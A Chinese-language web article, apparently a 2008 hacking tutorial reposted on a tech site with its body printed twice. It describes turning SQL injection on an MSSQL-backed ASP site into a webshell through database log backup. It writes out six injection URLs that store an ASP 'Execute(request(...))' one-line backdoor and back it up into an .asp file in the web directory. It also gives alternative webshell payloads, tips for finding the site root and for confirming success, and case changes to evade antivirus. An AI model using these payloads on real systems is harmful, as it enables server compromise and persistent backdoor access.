log備份的入侵技巧總結
互聯(lián)網 發(fā)布時間:2008-10-08 19:36:14 作者:佚名
我要評論

當SQL注入是得到DB權限時候,接下來可以做的工作很多,象找管理員密碼,后臺管理這些都可以幫助你拿到WEBSHELL,但是這篇文章講的是log備份,LOG備份出來的小馬的體積小,而且備份的成功的可性很大,所以是我作為對DB權限的第一種試探方法.
但是在LOG備份中,我們經常會
當SQL注入是得到DB權限時候,接下來可以做的工作很多,象找管理員密碼,后臺管理這些都可以幫助你拿到WEBSHELL,但是這篇文章講的是log備份,LOG備份出來的小馬的體積小,而且備份的成功的可性很大,所以是我作為對DB權限的第一種試探方法.
但是在LOG備份中,我們經常會遇到一些很讓我們頭痛的問題,那就是閉合的問題,我在這里做個總結,也
好讓我們對不能閉合的方法有一個全面的了解.
1.先介紹下LOG備份,這個相信大家都很熟悉了,我還是習慣在IE里直接提交,返回正常的頁面就說這一步的操作就成功了,如果沒有返回正常的頁面,我們就可以根據IE返回的錯誤來找他的原因.(這里說下要將IE的錯誤提示給打開),LOG的格式如下所示:
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:cmd' with init
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%Execute(request("go"))%%>')--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:xxxxxxasp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--
分為6步操作,最容易出錯的就是第4步的操作,經常返回沒有閉合的問題,下面就是一些我們可以將
values中的內容可以進行更換的方式,當我們的一種方式不行的話,就可以換另一種方式,當所有的方式
都換完了,沒有什么好說的,要么就放棄,要么就換另一種方式繼續(xù),想列目錄找數(shù)據庫下載,后臺.這
里就不多說了,可以提換的內容有:
a).<%%Execute(request("go"))%%>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%Execute(request("l"))%>
<%execute request("a")%>
2.LOG備份要注意的一些問題:
a).要注意你現(xiàn)在的機器是不是WEB主機,簡單的方法就是翻他的目錄,看有沒有IIS安裝的文件
b).當你確定你要找的確實是WEN主機時,就可以找他的站點目錄了,這個也很重要,是步驟5的操作,如果備份到一個錯誤的目錄,當然就沒有辦法訪問了
c).備份成功后,你就可以試著用客戶端去連接,這個地方也有人弄錯,現(xiàn)在用的字段是go,你的客戶端的
相關字段也為go
d).用ececute正常備份出來的是用錯誤提示的,當你的顯示500錯誤時,請你將的IE錯誤提示打開,當顯示
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'
類型不匹配: 'execute'
時候表示你已經成功了,連接吧!!
e).還有極端的時候你備份出來的一句話被殺(當你確定你確實是備份在WEB主機的對應目錄是),你可以將
上面的VALUES字段中的值做幾個大小寫轉換,一般是沒有問題的..
3.因為這篇文章用了很多前輩的東西,不敢說是原創(chuàng),只能算做是討論,我會將我所知道的東西在以后的
日子里一一更新上去..謝謝!!
4.感謝各位前輩提出這么一個好方法否則就不會有這篇文章了..
但是在LOG備份中,我們經常會遇到一些很讓我們頭痛的問題,那就是閉合的問題,我在這里做個總結,也
好讓我們對不能閉合的方法有一個全面的了解.
1.先介紹下LOG備份,這個相信大家都很熟悉了,我還是習慣在IE里直接提交,返回正常的頁面就說這一步的操作就成功了,如果沒有返回正常的頁面,我們就可以根據IE返回的錯誤來找他的原因.(這里說下要將IE的錯誤提示給打開),LOG的格式如下所示:
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:cmd' with init
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%Execute(request("go"))%%>')--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:xxxxxxasp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--
分為6步操作,最容易出錯的就是第4步的操作,經常返回沒有閉合的問題,下面就是一些我們可以將
values中的內容可以進行更換的方式,當我們的一種方式不行的話,就可以換另一種方式,當所有的方式
都換完了,沒有什么好說的,要么就放棄,要么就換另一種方式繼續(xù),想列目錄找數(shù)據庫下載,后臺.這
里就不多說了,可以提換的內容有:
a).<%%Execute(request("go"))%%>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%Execute(request("l"))%>
<%execute request("a")%>
2.LOG備份要注意的一些問題:
a).要注意你現(xiàn)在的機器是不是WEB主機,簡單的方法就是翻他的目錄,看有沒有IIS安裝的文件
b).當你確定你要找的確實是WEN主機時,就可以找他的站點目錄了,這個也很重要,是步驟5的操作,如果備份到一個錯誤的目錄,當然就沒有辦法訪問了
c).備份成功后,你就可以試著用客戶端去連接,這個地方也有人弄錯,現(xiàn)在用的字段是go,你的客戶端的
相關字段也為go
d).用ececute正常備份出來的是用錯誤提示的,當你的顯示500錯誤時,請你將的IE錯誤提示打開,當顯示
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'
類型不匹配: 'execute'
時候表示你已經成功了,連接吧!!
e).還有極端的時候你備份出來的一句話被殺(當你確定你確實是備份在WEB主機的對應目錄是),你可以將
上面的VALUES字段中的值做幾個大小寫轉換,一般是沒有問題的..
3.因為這篇文章用了很多前輩的東西,不敢說是原創(chuàng),只能算做是討論,我會將我所知道的東西在以后的
日子里一一更新上去..謝謝!!
4.感謝各位前輩提出這么一個好方法否則就不會有這篇文章了..
相關文章
- CC主要是用來攻擊頁面的,大家都有這樣的經歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06
Windows系統(tǒng)安全風險-本地NTLM重放提權
入侵者主要通過Potato程序攻擊擁有SYSTEM權限的端口偽造網絡身份認證過程,利用NTLM重放機制騙取SYSTEM身份令牌,最終取得系統(tǒng)權限,該安全風險微軟并不認為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結,這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權,需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據獲取明文
不久之前我們說過關于http和https的區(qū)別,對于加密的https,我們一直認為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導致用戶信息泄露。2016-07-27- 國家正在修正關于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進入攻擊者郵箱2016-07-06